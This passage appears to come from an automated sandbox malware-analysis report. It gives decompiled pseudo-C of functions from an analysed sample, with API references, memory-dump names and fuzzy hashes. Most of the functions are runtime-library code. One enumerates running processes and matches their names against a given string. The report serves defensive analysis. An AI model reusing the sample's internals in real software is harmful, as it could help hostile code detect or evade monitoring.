				asm("fild dword [ebp+0x8]");
				asm("fsubp st1, st0");
				 *0x3ce3a8 = _t140;
				_t82 =  *0x3ce0fc; // 0xe5101c30
				 *0x3ce38c = _t82 + 0x1d12fedc;
				 *0x3ce0fc =  *0x3ce0fc - 1;
				_t60 =  *0x3ce0e8; // 0xe89a10bc
				_a4 = _t60 + 0x54e307d;
				asm("fild dword [ebp+0x8]");
				 *_t91 = 0;
				_v20 = _t140;
				 *0x3ce3b4 =  *0x3ce20c + _v20;
				return 0;
			}

0x00389c86
0x00389c91
0x00389c96
0x00389ca0
0x00389ca5
0x00389ca8
0x00389cb7
0x00389cc0
0x00389cc3
0x00389ccb
0x00389cd7
0x00389cd9
0x00389ce0
0x00389ce8
0x00389cee
0x00389cfb
0x00389cfd
0x00389d09
0x00389d15
0x00389d1b
0x00389d27
0x00389d29
0x00389d2f
0x00389d35
0x00389d4a
0x00389d4c
0x00389d51
0x00389d54
0x00389d57
0x00389d68
0x00389d68
0x00389d6d
0x00389d79
0x00389d7f
0x00389d85
0x00389d8d
0x00389d90
0x00389d96
0x00389da2
0x00389dae
0x00389db0
0x00389dc7
0x00389dcf
0x00389de7
0x00389df3
0x00389df5
0x00389dfa
0x00389e69
0x00389dfc
0x00389e02
0x00389e06
0x00389e08
0x00389e0a
0x00389e10
0x00389e1c
0x00389e22
0x00389e28
0x00389e2b
0x00389e2e
0x00389e31
0x00389e34
0x00389e3d
0x00389e40
0x00389e4a
0x00389e53
0x00389e55
0x00389e61
0x00389e61
0x00389e53
0x00389e77
0x00389e7a
0x00389e80
0x00389e83
0x00389e8f
0x00389e9b
0x00389ea0
0x00389ea2
0x00389ea4
0x00389ea6
0x00389eac
0x00389eb6
0x00389ebc
0x00389ebf
0x00389ec2
0x00389ec5
0x00389ed1
0x00389ed7
0x00389eea
0x00389ef6
0x00389f05
0x00389f0b
0x00389f0e
0x00389f10
0x00389f16
0x00389f1f
0x00389f21
0x00389f21
0x00389f2b
0x00389f37
0x00389f3b
0x00389f3e
0x00389f44
0x00389f50
0x00389f5f
0x00389f62
0x00389f64
0x00389f6a
0x00389f6c
0x00389f6e
0x00389f77
0x00389f79
0x00389f83
0x00389f86
0x00389f89
0x00389f9a
0x00389f9a
0x00389fa0
0x00389fa6
0x00389fb5
0x00389fb9
0x00389fbc
0x00389fbe
0x00389fc4
0x00389fd0
0x00389fd6
0x00389fdc
0x00389fe6
0x00389fe9
0x00389fec
0x00389ff5
0x0038a001
0x0038a00a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00389D21
WaitForSingleObject.KERNEL32(-0389EBBB,00002710), ref: 00389DCF
CloseHandle.KERNEL32(003C3935), ref: 00389F44

Strings

59<, xrefs: 00389E9B

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseCreateEventHandleObjectSingleWait
String ID: 59<
API String ID: 2631291778-4228517716
Opcode ID: 3fb080028d4e7650baac9c79d2b9a99f753958e70fa0942a10596bc8e4408cb2
Instruction ID: 31dedd85f33b10b262e0ed6aca5369cfbec2ec20741ab0a02f2f5c894b4986ff
Opcode Fuzzy Hash: 3fb080028d4e7650baac9c79d2b9a99f753958e70fa0942a10596bc8e4408cb2
Instruction Fuzzy Hash: 97A17D35901619DBE706AF61FC8CAA97F7CFB85341F558846D881D62A8EB3170B0CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0039DA91 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0039DA91(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E003A63FC(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E003A2554(_t96));
										_t71 = E003A2480(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E0039D22F(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E0039C200( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E0039FA66(_t100))) = 0x16;
					E0039C1AB();
					goto L4;
				}
			}

0x0039da9c
0x0039daa1
0x0039dac0
0x00000000
0x0039daa9
0x0039daa9
0x0039daac
0x0039daae
0x0039dac7
0x0039daca
0x0039dacc
0x00000000
0x00000000
0x0039dace
0x0039dad3
0x0039dad5
0x0039dad8
0x00000000
0x00000000
0x0039dada
0x0039dade
0x0039dae5
0x0039dae8
0x0039daeb
0x0039daed
0x0039daf7
0x0039daef
0x0039daf2
0x0039daf2
0x0039dafe
0x0039db00
0x0039dbc5
0x00000000
0x0039db06
0x0039db06
0x0039db09
0x0039db09
0x0039db0f
0x0039db40
0x0039db40
0x0039db43
0x0039db9c
0x0039dba3
0x0039dba6
0x0039dbd1
0x0039dbd1
0x0039dbd3
0x00000000
0x0039dbd7
0x0039dba8
0x0039dbab
0x0039dbae
0x0039dbaf
0x0039dbb2
0x0039dbb4
0x0039dbb6
0x0039dbb6
0x00000000
0x0039dbb4
0x0039db45
0x0039db47
0x0039db54
0x0039db54
0x0039db58
0x0039db5a
0x0039db5e
0x0039db60
0x0039db63
0x0039db63
0x0039db63
0x0039db65
0x0039db66
0x0039db70
0x0039db71
0x0039db76
0x0039db79
0x0039db7c
0x0039dbdf
0x0039dbdf
0x0039dbe3
0x00000000
0x0039db7e
0x0039db7e
0x0039db80
0x0039db82
0x0039db84
0x0039db84
0x0039db86
0x0039db89
0x0039db8b
0x0039db8d
0x00000000
0x0039db8f
0x0039db8f
0x0039db8f
0x00000000
0x0039db8f
0x0039db8d
0x0039db7c
0x0039db4a
0x0039db50
0x0039db52
0x00000000
0x00000000
0x00000000
0x0039db52
0x0039db11
0x0039db14
0x0039db16
0x00000000
0x00000000
0x0039db18
0x0039dbcd
0x0039dbcd
0x0039dbcd
0x00000000
0x0039dbcd
0x0039db1e
0x0039db20
0x0039db22
0x0039db24
0x0039db24
0x0039db2c
0x0039db31
0x0039db34
0x0039db36
0x0039db39
0x0039db3b
0x00000000
0x0039dbbd
0x0039dbbd
0x0039dbbd
0x00000000
0x0039db06
0x0039db00
0x0039dab0
0x0039dab5
0x0039dabb
0x00000000
0x0039dabb

APIs

__flush.LIBCMT ref: 0039DB4A
__write.LIBCMT ref: 0039DB71
__flsbuf.LIBCMT ref: 0039DB9C

Part of subcall function 0039FA66: __getptd_noexit.LIBCMT ref: 0039FA66

Strings

x>8, xrefs: 0039DA93

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write
String ID: x>8
API String ID: 3115901604-3429122841
Opcode ID: a22be4784b850155ee48ffe8c6d52f29cf11b7bfda8fcb872855a0b31ab4bf63
Instruction ID: 5c37a41a213a3a492229ed9ac8acd04aa2cce57033384cac1036e1f4eb468235
Opcode Fuzzy Hash: a22be4784b850155ee48ffe8c6d52f29cf11b7bfda8fcb872855a0b31ab4bf63
Instruction Fuzzy Hash: D541D531A046059FDF269F79C9866AFBBB5EF80360F2A452CE41597280E770DE51CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003A281E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003A281E() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x3d2880;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x3d2880 = _t5;
				}
				_t6 = E003B1B61(_t5, 4);
				 *0x3d1860 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x3ceac0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x3ced40) {
							break;
						}
						_t6 =  *0x3d1860; // 0x2d820e0
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x3cead0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x3d1760 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x3ceb30);
					return 0;
				} else {
					 *0x3d2880 = _t26;
					_t6 = E003B1B61(_t26, 4);
					 *0x3d1860 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x003a281e
0x003a2826
0x003a2829
0x003a2834
0x003a2836
0x00000000
0x003a2836
0x003a282b
0x003a282b
0x003a2838
0x003a2838
0x003a2838
0x003a2840
0x003a2847
0x003a284e
0x003a286e
0x003a286e
0x003a2870
0x003a287c
0x003a287c
0x003a287f
0x003a2882
0x003a288b
0x00000000
0x00000000
0x003a2877
0x003a2877
0x003a288f
0x003a2890
0x003a2892
0x003a2898
0x003a28ac
0x003a28b2
0x003a28bc
0x003a28bc
0x003a28be
0x003a28c1
0x003a28c2
0x003a28ce
0x003a2850
0x003a2853
0x003a2859
0x003a2860
0x003a2867
0x00000000
0x003a2869
0x003a286b
0x003a286d
0x003a286d
0x003a2867

APIs

__calloc_crt.LIBCMT ref: 003A2840
__calloc_crt.LIBCMT ref: 003A2859

Strings

@<, xrefs: 003A2885
0<, xrefs: 003A28C2

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __calloc_crt
String ID: 0<$@<
API String ID: 3494438863-3393057864
Opcode ID: 8e3786887cc74c32281cee7d93488899ece615585976131e728a622bf124084b
Instruction ID: 81d2ba85a1d5e022d0eec58925a33e5b82cd446852ed5f091be950d57d20b547
Opcode Fuzzy Hash: 8e3786887cc74c32281cee7d93488899ece615585976131e728a622bf124084b
Instruction Fuzzy Hash: B511E0326166195BE72B9B2EBC51A66738DEB97724B25022BF611CB2A0E738CC419244

Uniqueness

Uniqueness Score: -1.00%

Function 003B1E9E Relevance: 6.2, APIs: 4, Instructions: 173
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 99%

			E003B1E9E(void* __edx, signed char* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v7;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _t72;
				signed int _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				signed short _t82;
				void* _t84;
				signed short _t87;
				intOrPtr _t91;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				signed int _t104;
				signed char* _t115;
				signed char* _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t125;
				signed int _t126;
				void* _t128;

				E0039EE17( &_v24, __edx, _a12);
				_t115 = _a4;
				_t130 = _t115;
				if(_t115 != 0) {
					_t97 = _a8;
					__eflags = _t97;
					if(__eflags != 0) {
						_t72 = _v20;
						__eflags =  *(_t72 + 8);
						if( *(_t72 + 8) != 0) {
							while(1) {
								_t100 =  *_t115 & 0x000000ff;
								_t125 = _t100 & 0x000000ff;
								_t116 =  &(_t115[1]);
								__eflags =  *(_t125 + _t72 + 0x1d) & 0x00000004;
								_a4 = _t116;
								if(( *(_t125 + _t72 + 0x1d) & 0x00000004) == 0) {
									goto L20;
								}
								__eflags =  *_t116;
								if(__eflags != 0) {
									_t84 = E003B4562(__eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t116 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
									_t128 = _t128 + 0x24;
									__eflags = _t84 - 1;
									if(_t84 != 1) {
										__eflags = _t84 - 2;
										if(__eflags != 0) {
											goto L37;
										} else {
											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
											__eflags = _t87;
											_t126 = _t87 & 0x0000ffff;
											goto L19;
										}
									} else {
										_t126 = _v8 & 0x000000ff;
										L19:
										_a4 =  &(_a4[1]);
										_t72 = _v20;
										goto L23;
									}
								} else {
									_t126 = 0;
									L23:
									_t102 =  *_t97 & 0x000000ff;
									_t118 = _t102 & 0x000000ff;
									_t97 = _t97 + 1;
									__eflags =  *(_t118 + _t72 + 0x1d) & 0x00000004;
									if(( *(_t118 + _t72 + 0x1d) & 0x00000004) == 0) {
										_t119 = _t102;
										_t103 = _t119 + _t72;
										__eflags =  *(_t103 + 0x1d) & 0x00000010;
										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
											_t104 = _t119;
										} else {
											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
										}
										goto L34;
									} else {
										__eflags =  *_t97;
										if(__eflags != 0) {
											_t46 = _t97 - 1; // 0x39d1bb
											_t77 = E003B4562(__eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t46, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
											_t128 = _t128 + 0x24;
											__eflags = _t77 - 1;
											if(_t77 != 1) {
												__eflags = _t77 - 2;
												if(__eflags != 0) {
													L37:
													 *((intOrPtr*)(E0039FA66(__eflags))) = 0x16;
													__eflags = _v12;
													if(_v12 != 0) {
														_t79 = _v16;
														_t61 = _t79 + 0x70;
														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
														__eflags =  *_t61;
													}
													_t74 = 0x7fffffff;
												} else {
													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
													__eflags = _t82;
													_t104 = _t82 & 0x0000ffff;
													goto L30;
												}
											} else {
												_t104 = _v8 & 0x000000ff;
												L30:
												_t72 = _v20;
												_t97 = _t97 + 1;
												goto L34;
											}
										} else {
											_t104 = 0;
											L34:
											__eflags = _t104 - _t126;
											if(_t104 != _t126) {
												asm("sbb eax, eax");
												_t74 = (_t72 & 0x00000002) - 1;
												__eflags = _v12;
												if(_v12 != 0) {
													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
												}
											} else {
												__eflags = _t126;
												if(_t126 == 0) {
													__eflags = _v12;
													if(_v12 != 0) {
														_t75 = _v16;
														_t69 = _t75 + 0x70;
														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
														__eflags =  *_t69;
													}
													_t74 = 0;
													__eflags = 0;
												} else {
													_t115 = _a4;
													continue;
												}
											}
										}
									}
								}
								goto L46;
								L20:
								_t117 = _t100;
								_t101 = _t117 + _t72;
								__eflags =  *(_t101 + 0x1d) & 0x00000010;
								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
									_t126 = _t117;
								} else {
									_t126 =  *(_t101 + 0x11d) & 0x000000ff;
								}
								goto L23;
							}
						} else {
							_t74 = E003BC2F6(_t115, _t115, _t97,  &_v24);
							__eflags = _v12;
							if(_v12 != 0) {
								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
							}
						}
					} else {
						 *((intOrPtr*)(E0039FA66(__eflags))) = 0x16;
						E0039C1AB();
						__eflags = _v12 - _t97;
						if(_v12 != _t97) {
							_t91 = _v16;
							_t11 = _t91 + 0x70;
							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						_t74 = 0x7fffffff;
					}
					L46:
					return _t74;
				} else {
					 *((intOrPtr*)(E0039FA66(_t130))) = 0x16;
					E0039C1AB();
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0x7fffffff;
				}
			}

0x003b1eac
0x003b1eb1
0x003b1eb4
0x003b1eb6
0x003b1edd
0x003b1ee0
0x003b1ee2
0x003b1f0a
0x003b1f0d
0x003b1f11
0x003b1f3e
0x003b1f3e
0x003b1f41
0x003b1f44
0x003b1f45
0x003b1f4a
0x003b1f4d
0x00000000
0x00000000
0x003b1f4f
0x003b1f52
0x003b1f6f
0x003b1f74
0x003b1f77
0x003b1f7a
0x003b1f82
0x003b1f85
0x00000000
0x003b1f8b
0x003b1f9c
0x003b1f9c
0x003b1f9f
0x00000000
0x003b1f9f
0x003b1f7c
0x003b1f7c
0x003b1fa2
0x003b1fa2
0x003b1fa5
0x00000000
0x003b1fa5
0x003b1f54
0x003b1f54
0x003b1fc0
0x003b1fc0
0x003b1fc3
0x003b1fc6
0x003b1fc7
0x003b1fcc
0x003b2025
0x003b2027
0x003b202a
0x003b202e
0x003b2039
0x003b2030
0x003b2030
0x003b2030
0x00000000
0x003b1fce
0x003b1fce
0x003b1fd1
0x003b1fe4
0x003b1ff0
0x003b1ff5
0x003b1ff8
0x003b1ffb
0x003b2003
0x003b2006
0x003b204d
0x003b2052
0x003b2058
0x003b205c
0x003b205e
0x003b2061
0x003b2061
0x003b2061
0x003b2061
0x003b2065
0x003b2008
0x003b2019
0x003b2019
0x003b201c
0x00000000
0x003b201c
0x003b1ffd
0x003b1ffd
0x003b201f
0x003b201f
0x003b2022
0x00000000
0x003b2022
0x003b1fd3
0x003b1fd3
0x003b203b
0x003b203b
0x003b203e
0x003b206c
0x003b2071
0x003b2072
0x003b2076
0x003b207b
0x003b207b
0x003b2040
0x003b2040
0x003b2043
0x003b2081
0x003b2085
0x003b2087
0x003b208a
0x003b208a
0x003b208a
0x003b208a
0x003b208e
0x003b208e
0x003b2045
0x003b2045
0x00000000
0x003b2045
0x003b2043
0x003b203e
0x003b1fd1
0x003b1fcc
0x00000000
0x003b1faa
0x003b1faa
0x003b1fac
0x003b1faf
0x003b1fb3
0x003b1fbe
0x003b1fb5
0x003b1fb5
0x003b1fb5
0x00000000
0x003b1fb3
0x003b1f13
0x003b1f19
0x003b1f21
0x003b1f25
0x003b1f2e
0x003b1f2e
0x003b1f25
0x003b1ee4
0x003b1ee9
0x003b1eef
0x003b1ef4
0x003b1ef7
0x003b1ef9
0x003b1efc
0x003b1efc
0x003b1efc
0x003b1efc
0x003b1f00
0x003b1f00
0x003b2092
0x003b2094
0x003b1eb8
0x003b1ebd
0x003b1ec3
0x003b1ecc
0x003b1ed1
0x003b1ed1
0x003b1edb
0x003b1edb

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B1EAC

Part of subcall function 0039EE17: __getptd.LIBCMT ref: 0039EE2A

Part of subcall function 0039FA66: __getptd_noexit.LIBCMT ref: 0039FA66

__stricmp_l.LIBCMT ref: 003B1F19

Part of subcall function 003BC2F6: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003BC305

___crtLCMapStringA.LIBCMT ref: 003B1F6F
___crtLCMapStringA.LIBCMT ref: 003B1FF0

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 41000adf74629f179fe195b9832f3fda6c7d14183ab1da88fb0556a3e3bda965
Instruction ID: d62985e715924618233fe43e5f961872633ae92836fa0e1ec3afdd56a8b0f3df
Opcode Fuzzy Hash: 41000adf74629f179fe195b9832f3fda6c7d14183ab1da88fb0556a3e3bda965
Instruction Fuzzy Hash: 29513770904199AFDF27AB64C495BFB7BB4AB0132CF284399E6A15F9D2C7308E41D750

Uniqueness

Uniqueness Score: -1.00%

Function 00392E30 Relevance: 6.1, APIs: 4, Instructions: 132
processCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00392E30(intOrPtr* _a4) {
				signed char _v8;
				long long _v12;
				int _v16;
				long long _v24;
				signed long long _v32;
				void* _v328;
				char _v588;
				signed char _t34;
				signed char _t35;
				intOrPtr _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				intOrPtr _t47;
				intOrPtr* _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				char _t58;
				intOrPtr* _t59;
				short _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t69;
				void* _t71;
				void* _t72;
				long long _t86;
				long long _t88;
				signed long long _t95;

				_v16 = 0;
				_t86 =  *0x3ce584 -  *0x3c77d4;
				 *0x3ce584 = _t86;
				_t34 =  *0x3ce5c4; // 0x7fffffff
				_v8 = _t34;
				asm("fild dword [ebp-0x4]");
				_v12 = _t86;
				_t52 =  *0x3ce408; // 0xcc62
				_t88 =  *0x3ce15c + _v12;
				_v8 = _t52;
				_v24 = _t88;
				asm("fild dword [ebp-0x4]");
				_v32 = _t88 + _v24;
				_t35 =  *0x3ce458; // 0x5bdf
				_v24 =  *0x3ce5fc;
				_v8 = _t35;
				asm("fild dword [ebp-0x4]");
				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				_t95 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce5fc = _t95;
				asm("fsubr dword [0x3ce15c]");
				 *0x3ce15c = _t95;
				if((_t35 & 0x00000044) == 0) {
					_t47 =  *0x3ce38c; // 0x93fc1fee
					 *0x3ce0f8 = ( *0x3ce0f8 & 0x0000ffff) * (_t47 + 0xcd8c8686);
				}
				_t69 = CreateToolhelp32Snapshot(2, 0);
				if(_t69 != 0) {
					_t95 =  *0x3ce148;
					_t39 =  *0x3ce158; // 0x0
					_v8 = 0xb3962bdd - _t39;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0x3ce148 = _t95;
					 *0x3ce158 =  *0x3ce158 + 1;
					_v328 = 0x128;
					if(Process32First(_t69,  &_v328) != 0) {
						_t50 = _a4;
						do {
							_t42 = 0;
							do {
								_t58 =  *((intOrPtr*)(_t71 + _t42 - 0x120));
								 *((char*)(_t71 + _t42 - 0x248)) = _t58;
								_t42 = _t42 + 1;
							} while (_t58 != 0);
							E003C2BB6( &_v588);
							_t72 = _t72 + 4;
							_t59 = _t50;
							_t45 =  &_v588;
							while(1) {
								_t64 =  *_t45;
								if(_t64 !=  *_t59) {
									break;
								}
								if(_t64 == 0) {
									L12:
									_t45 = 0;
								} else {
									_t65 =  *((intOrPtr*)(_t45 + 1));
									_t26 = _t59 + 1; // 0xc08504c4
									if(_t65 !=  *_t26) {
										break;
									} else {
										_t45 = _t45 + 2;
										_t59 = _t59 + 2;
										if(_t65 != 0) {
											continue;
										} else {
											goto L12;
										}
									}
								}
								L14:
								if(_t45 == 0) {
									_v16 = 1;
								} else {
									goto L15;
								}
								L18:
								goto L19;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L14;
							L15:
							_v328 = 0x128;
						} while (Process32Next(_t69,  &_v328) != 0);
						goto L18;
					}
					L19:
					CloseHandle(_t69);
				}
				_t62 =  *0x3ce44c; // 0x2575
				_t54 =  *0x3ce5f8; // 0x92887c61
				_v8 = _t54 - _t62;
				asm("fild dword [ebp-0x4]");
				_v32 = _t95;
				 *0x3ce248 =  *0x3ce248 * _v32;
				 *0x3ce44c =  *0x3ce44c + 1;
				return _v16;
			}

0x00392e3f
0x00392e46
0x00392e4c
0x00392e52
0x00392e57
0x00392e5a
0x00392e5d
0x00392e66
0x00392e6d
0x00392e73
0x00392e76
0x00392e79
0x00392e7f
0x00392e88
0x00392e8e
0x00392e94
0x00392e97
0x00392ea6
0x00392ea8
0x00392eb0
0x00392eb2
0x00392eb4
0x00392eb6
0x00392eb8
0x00392ebe
0x00392ec4
0x00392ecd
0x00392ecf
0x00392ee3
0x00392ee3
0x00392ef5
0x00392ef9
0x00392eff
0x00392f05
0x00392f11
0x00392f14
0x00392f1f
0x00392f21
0x00392f27
0x00392f2d
0x00392f3f
0x00392f46
0x00392f50
0x00392f50
0x00392f60
0x00392f60
0x00392f67
0x00392f6e
0x00392f6f
0x00392f7a
0x00392f7f
0x00392f82
0x00392f84
0x00392f90
0x00392f90
0x00392f94
0x00000000
0x00000000
0x00392f98
0x00392fac
0x00392fac
0x00392f9a
0x00392f9a
0x00392f9d
0x00392fa0
0x00000000
0x00392fa2
0x00392fa2
0x00392fa5
0x00392faa
0x00000000
0x00000000
0x00000000
0x00000000
0x00392faa
0x00392fa0
0x00392fb5
0x00392fb7
0x00392fdb
0x00000000
0x00000000
0x00000000
